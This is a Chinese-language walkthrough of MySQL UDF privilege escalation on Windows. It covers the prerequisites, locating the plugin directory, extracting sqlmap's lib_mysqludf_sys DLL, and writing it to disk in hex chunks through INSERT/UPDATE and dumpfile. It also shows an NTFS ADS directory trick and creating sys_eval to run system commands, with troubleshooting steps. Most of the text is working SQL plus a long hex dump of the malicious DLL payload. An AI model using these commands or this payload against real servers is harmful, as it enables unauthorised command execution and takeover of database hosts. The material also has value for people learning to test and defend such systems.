UDF(user defind function)用户自定义函数,通过添加新函数,对MySQL的功能进行扩充。调用方式与一般系统自带的函数相同,例如user(),version()等函数。
udf 文件后缀在windows与linux系统下分别为dll与so,即动态链接库文件,由C、C++编写。
1.1 mysql配置文件secure_file_priv项设置为空,(如果为NULL或/tmp/等指定目录,即无法自定义udf文件导出位置,则无法利用);
1.2 CREATE权限、FILE权限(root用户默认拥有所有权限)。
2.1 INSERT权限、UPDATE权限、DELETE权限。
select * from mysql.user where user = substring_index(user(), '@', 1)\G;
udf提权操作中的一个步骤是将我们的udf文件上传到mysql的检索目录中,Windows系统下mysql各版本的检索目录有所不同:
导出路径随意。
Win2000导出路径: C:/Winnt/udf.dll
其他Windows系统导出路径均为:C:/Windows/udf.dll或C:/Windows/system32/udf.dll
Mysql安装目录的lib\plugin文件夹下,如果mysql安装时不选择完整安装或使用集成开发环境等情况下lib\plugin目录大概率是不存在的,需要自行创建。
show variables like '%secure%';
select * from mysql.user where user = substring_index(user(), '@', 1)\G;
select @@basedir as basePath from dual ;
show variables like '%basedir%';
此处显示为Windows 64位操作系统(此处应该是32位的win server2003,不知道是不是虚拟机环境的原因显示为64位)
python extra/cloak/cloak.py -d -i data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
select hex(load_file('C:\\lib_mysqludf_sys_32.dll')) into dumpfile 'C:\\lib_mysqludf_sys_32.txt';
select 0x4d5a900..... into dump file "C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll";
5.1.2.3 创建一个表并将二进制数据插入到十六进制编码流
如果在低版本系统环境下(win2003)或部分特殊环境使用mysql命令提示符进行提权操作,由于不同环境下的mysql命令提示符可输入字符最大长度不同(win2003为8191,win10系统为65535),无法使用dumpfile一次性写入全部16进制字符,则需要将udf文件的16进制编码字符先进行切割,再拼接写入到一个表中,最后导出到目标系统。
注意:在进行16进制数据切割时,每段字符的长度要为4的倍数,2进制转为16进制使用取四合一法,如果位数不够会在最高位补0,补0后会破坏原始二进制文件的文件结构导致利用失败,这也是很多人此方法复现失败的原因。
5.1.2.3.1 随便选择一个数据库后,创建一个表
use test;
create table udf(data longblob);
insert into udf(data) values (0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000004D477BD0092615830926158309261583005E86830B261583005E808308261583005E968307261583005E91830B2615832EE06E830A2615830926148325261583005E9C8308261583005E878308261583005E8483082615835269636809261583000000000000000000000000000000000000000000000000504500004C0103004AFE9F5A0000000000000000E00002210B010900001000000010000000600000607C0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007C83000008020000B4820000C800000000800000B402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002C7E00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E0555058310000000000100000007000000010000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000140000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D090208B92BCF11B11CEEA24F550000560C000000220000260000A8FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015E5DFB77FBC38B44240C1A6A071611108BF8183218FF63DB6F1CA45FC7011E1200210883380175128B40040DF6776F0700750A1004C6000132C0C3530ABF1DF68D3C3053A454082D08FF30FF15FFF6EE776C885985C075085614C601011BC8568D71018A11FD6FDFFE4184D275F98B54142BCE890A32558BEC8B4D0C833902B7D860BF5374148B7D10915C5453EB4CBF9DBDDF8B417D740F1B707C1BEBE5836004DBB1FFB7001A0C8B48048B008D4401025072A0594C08DFC8D7B5891678113006A44CEB6C57BEB7B2B85F5E5DA30421740833DBB63FF6A8591353568B742410D878534602DB85DB5BB6460851C78D5C4257E8240B75EEEEBFE01400C604070008FF70041E0553B1DB1B921A22C418535720030054090F09B7086A995B0F98599954CF2D343713B8F4540B1EDEB60D818403552251519D35DFFED6FEDF576800F762D66A018945FC068BF08B4560DD7FF70CC606004533FF595939387471683CC071C6FEDFDA9C12260C3BC7745B506A04FF75FC149073E1EDD7A9FD48533AFC8D48911040B963DBFF2BC18BD88D043B505630F8268C5330D8AD8DBD5F03FE570E940DE57DF8463FE6364C2066BA5B1810A4803E0059169EB0FF741A8BC6C64437FF00594D1489C906987BEBD86F183E5F205EC9C3EED7B235DCBAF37D574708C45030087BDBDACDC9C26A4078C710548D4601B9E07E614251724F0856FF31CF6BAFDD9DB694C66AFF8DC32082F63A58B0B6030D092C23005F7CC36E57036C6A081D1290AC0AA88365FC2F6C2F2C2D4592D0EB071B408F65E8C70BBFD66E42FEFF000D1FEDC25E3BFFDB17B60D08209A02F3C3E90806F58BFF56688000002D8C6D675880985608845AA3BDE0FEBB062358045485F675054DAA83260076FBB7DB4508C36F08ED09ACC704240607FF0B4C113637598D71FFCF9C0BBF77DFC9750E39056B107E3CFF7310830B01FBEEC6BB8B0910548B098F57890A23480F85D47D618CBBAD641718068B79040838071B76EDEEBB1E50EB184AA705B8E61768B0B030D8E803A83C0957C1D6BBAEB5D6A1E7E9E2573CA12F4C6A6FF777C3025EFD096A1FEE76EB3CAA10C80475ED7BEFC0C7051F281A70E027071BDFF79D5CB520BC04B81B6A5635B952EB782B7339B2E3696FF7DEFD7340393D155C741C68062809AC43DB6B85850D9E1034252316FFE666F862F154B201DC0801592CC2B1A1DB78049DDFDBF62413D90FD4FC83F80266B16F6CB0D2595BFFA0584B77783BB5783106350F8487C71996EE4CD3543BF81810897D82EFC796BE35FAC87251833F8AF36A7C398587B4F10774E9FFC8D60F7C89C5DB9BB5D955F85615441B474DED5BE38EF88A394D1003D00874B48909437AA36D020C1AD3F8EBA71C3162CC5A64442E386161FB0A58064C32FC19503F1BDF720443375BC9C20CC710FB02231FB2288B2EF28B5D081CAE0FDB9B54E433C95CFC7D2008016C2DC6C23BF15A393A4417E4D61BFE7FAFAE3BF0740583FE02752E1910D03BC1E7166EB8ED57565FD03B5EE40003937B703B67115A039614168012376C7D270A8227FEA0246420575062B30D661327002F527F8DF61AD2061153F76A037543B067BB614F34032168742E2C0D2C3CEC257FEB1B71EC5A09706A7C6FAAE05051597C64825D900EADF62FFA8A19066B8F91B6C72AE490C396EC1640E134A9FF3B246ABB41C1F17926547DBC550C0D381E33BC05BC595D382281EC2832F7869F365F212043211C895E2118891D05F78EC243143C21A2AA210C668C186C5FFBDA3806252C0620080605DD2DCDD20425002D7FFC9C8F7AB6B1F6143095562407042831D6FEDB7F0807348B85E0FCA0AA701DDBB5B395011C1920241318092B18476A565F201CB360C32C9F7B8985D8320A04DC03B557E01B243468DEDFD1F7D8D360CE2879D40A2C833D208DBDC3DA00F923685B1B300BDFAF67F534C97F23401EC25F6A4849918F144A50152E9DF458AAF8A29C10F3EB67611C7E052C37D4598FEDED8321B9273551E0F5EE3BDC0ABF03E4507F4B8417185BDB7E600BCE1CDC142CD6E288B154B609E01B14F413160A4BDB313DDCDBFFDC84676CC859D94E1E07F7D81BF076BBB7C00359485D1656B8BC18BE04A3638B6F2AF83BC673080753025073D85F60835A3BFE72F15F5E25206C6053C820CC006F35B4DD452BB84D5A346627040B85BF2B5E6E413C03C1813850E45FEFA5ECFFFB33D2B90B011C48180F94C28BC25DC33FB702BF35E34831C80FB74114AE057106C1A55B6C33578C081817761BFFFF2FF1D7487BF972098B580803D93BFB720A4283C0283BD67270CA36B5E86AE55DC38F6AFEF0CD71F7A970040B056418005083EC080DB7C670082F316C33C576F0852F06DF64A31A89B90968555DB7F081F0B2091C6B04F555972DD12C937D1350195C083B04E1C26F2724C1E81FF715E0018FEFB6532B034F230059948BE55DC3621DDB49A301CA3DAFC0FAE99525242631CCFF29343232B61058054C50AC2CB41E97AF12B60D56096B27D7616B20CFB0FBEF2AE4E03160031F73D9665B9A6C038D2BE0FAFC046BA039F13CB4FC8A0D6C120C7D0DC395C3C1619C965154147FE41F3E783124F020140BDAC40E5643B25D53EC1068F885626DF4F888C9BF4EE640BB25EEA0398466820D85C33149DB9F0A359A04EB605675F869639FC1F6448B7598751F1033F0071476E6CA20189D271CB4F6EE6FEDF4330C113BF77507BE4F59EB0B85F30A7B047EA10AC1E0100BF0CE00F7D6076C840D1E045E5F01C33F5C05646464646064686C1405766474B000003FF4C20E034B0F20185F4E6F20FFFFB7FF617267756D656E7473096C6C6F77656420287564663A206C69625F6DCCFD6DF77973716C0D5F73085F696E666F293918DFB6FF8F2076657273696F6E20302E01341F45787065F6DBDBDD637447657861076C79201A65207374723F5BDB5AFB672074791B75726171217258C00E602B7477911FD86F030B3F8672206E616D48DBB1B71F436F756C246E6F74C4636113203058B76D186D2779AF72F1483FDA4D943F2003121071051BF29D5860214707D0604D0D0B0F81CB074ED961DD9703AB17CC2708A77527ECC00FD81F0A3B034FC0A07B851F03240328C1556583A200C5889251CA22D877BDB119BF44FF000F5565A3AA00A8AA9251645455C95532AAAAFFF61D455C0410020157616974466F00FC06C07253886C654F626A07C07F6B99145669727475616C417603E0F6370D536574456E76126F6EC000BC6DBF5661726961622B4118437265F76DEB6E94546806640D47264375727222CD12F65B502A636573734914266E03E083135469636BDE6E6BB1F6B6FD5175657279500366846D616E371667EF1B00FD0144697367374CFDB7EDED6962727879436192731A4973446562756767EDEE6DAD266A686546A4556E6840B1B7B7B7643164457846707469AF46696C4A6D295B6119B41254DE64AEB0176D0DD8114990B9EDD61A0A6B409D6D70876547C25A73CD517F77555122B4ED6E591B5C537973186DEEC3C2EB2E39417373650975697CDB15DA434C7D5F687E396D5F2EDFFEDEBE5F616D7367087869740B646A753A5F666469EC4217B076260A639A5F64FD6CADB91F5F686F6F6B131459725FF802700148D15FDB9CEB0249730A330A6C21D6F0BD82539C2A64D46E640893050B130F651E6B5B7BC25F2C723456ED6D1C182FF6D69A700A035F706F522947E1DDBE6E106468756C5EB92A6BCB92BD9B1B2CA806E0B6D86E6EC57265250866112E827BDB5673749C637079082439EDCD5C6B32C06E4D0FD7ED1F5AC36F7319663A1F5F4370705831C75E3B8474BC6D343F001817FFFFFFFF3D193C1C1B161E55142D16270815270F11115F10130A070D2E17090705160C1E7FFBFFFF080A0B160918181505061B050C10060717062105110F061421110B08E4FBDFB62B22052A111D0D18532D483806000776FBDBE5080C09330A090B0C051007061612EEDFFEED0E0B34150B18160D3D0542C205121E14066930FFD8DDFF110C0E1D4D0517230D0C3224080B4506F0DE041004F03B0A6EFF2C01043808041C1C0204003E4C016DFF21FD05004AFE9F5A8FE00002210B0109080C634F7AD60C1213D616A300);
5.1.2.3.2 update拼接剩余数据
update udf set data = concat(data,0x200E10C10A01630B02AB3362B7EE6107006003040233351EEED9C0CE34100706C02633D6EDDB7620AC22033C144002B0021C5759DD0050520143C8C8BA65B1214200A7B82F06DB5D182EB4787407EA0B900C5BFA90CDB742602E72647D610861C90E76C508FB0A00C700A1DB66BB77402E26300304301BECDB943D001A27C04F73726300EB11C0061B40731C4F78C2C2A365761F01030002ED7760497B27421BA023030000EDD8D152127C53030400000000000080FF00000000000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92A0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B472000001F35083C708FF96F0720000958A074708C074DC89F95748F2AE55FF96F472000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF87200008DBE00F0FFFFBB0010000050546A045357FFD58D871702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9AD98FFFF0000004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030001010220010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000056020000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E504100000000000000000000000010830000F08200000000000000000000000000001D83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004B45524E454C33322E444C4C004D5356435239302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004AFE9F5A0000000058840000010000001200000012000000A4830000EC8300003484000021100000A312000000100000A4120000A3120000A0120000CC110000A31200009811000086110000A31200009811000076100000A3120000431000002E1100001A110000A91000006D84000083840000A0840000BB840000C7840000DA840000EB840000F484000004850000128500001B8500002B8500003985000041850000508500005D850000658500007485000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E69740000000000700000100000006D3C683E6C3E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
5.1.2.3.3 导出表中数据到系统磁盘
select data from udf into dumpfile "C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll";
5.1.3 查看 plugin 目录,不存在 lib\plugin目录但有webshell,可使用webshell创建lib\plugin目录。
5.1.4 查看 plugin 目录,不存在 lib\plugin目录也没有webshell,此时就要使用网传ADS文件流创建目录的方法了,上次听到这个名词还是在做upload-labs靶场的时候。
ADS文件流是NTFS文件系统为了能与Mac系统下的HFS文件系统兼容而设计出的。
经实践在命令提示符下使用ADS文件流是可以成功创建目录或者文件名的,但在独立安装的mysql数据库环境与phpstudy自带mysql环境下均创建失败,并且查阅网上各种文章也都是没有利用成功的,严重怀疑是哪位小可爱臆想出来的,但为了文章完整性还是决定写出来。
echo 123 >D:\phpstudy\PHPTutorial\MySQL\lib::$INDEX_ALLOCATION
select "123" into dumpfile "D:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION";
使用winhex打开udf文件,在最下方可以看到udf文件提供的函数。
sys_eval,执行任意系统命令,并将输出返回。
sys_exec,执行任意系统命令,并将退出码返回(无命令执行结果回显)。
create function sys_eval returns string soname 'udf.dll';
select sys_eval("whoami");
1、删除表
drop table udf;
2、删除函数
drop function sys_eval;
提示sys_eval 函数已经存在,可能已经被利用过了,尝试直接调用函数。
尝试将udf提权相关的利用函数进行删除后重新创建
函数不存在(实战无法解决,漏洞复现可以)。**
原因是上一个人利用过后,数据库进行了重启。
之后重启mysqld服务器,再创建就可以了。
在进行udf提权时碰到这个错误一般是ufd文件位数选择错误,尝试另一个位数的udf文件。
一、简述
Linux环境下的udf提权除利用条件外与Windows环境下完全相同。
利用条件:除windows篇中的内容外,还需要plugin目录的写入权限。